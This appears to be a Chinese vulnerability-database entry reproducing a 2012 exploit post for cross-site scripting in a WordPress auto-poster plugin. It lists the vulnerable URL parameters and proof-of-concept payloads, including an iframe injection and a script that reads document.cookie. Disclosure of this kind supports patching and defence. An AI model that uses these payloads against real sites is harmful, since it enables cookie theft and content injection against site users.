Yahoo Answer Wordpress Auto Poster Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047642 漏洞类型
发布时间 2012-04-17 更新时间 2012-04-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040135
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##################################################
# Exploit Title: Yahoo Answer Wordpress Auto Poster(Plugin) <= XSS Vulnerability
# Date: 16/04/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# Security:RISK: High
# Vendor or Software Link: http://www.tryscripts.org/wordpress/yahoo/
# Google dork: -
# Tested on: Linux
##################################################
[~]Exploit/p0c :

http://localhost:80/[]/[]/process-imported-question.php?catname=[xss]
http://localhost:80/[]/[]/editautopilot.php?query=[xss]

[~]Proof of Concept:

1.1
he issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context. 

Strings: >"<<iframe src=tp://justryuz.blogspot.com>3</iframe> OR >"<script>alert(document.cookie)</script>

[~]Dem0 :

http://www.tryscripts.org/wordpress/yahoo/


FB : www.fb.me/justryuz
+---------------------------------------------------+
 Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+

CyberSEC  2012 All rights reserved.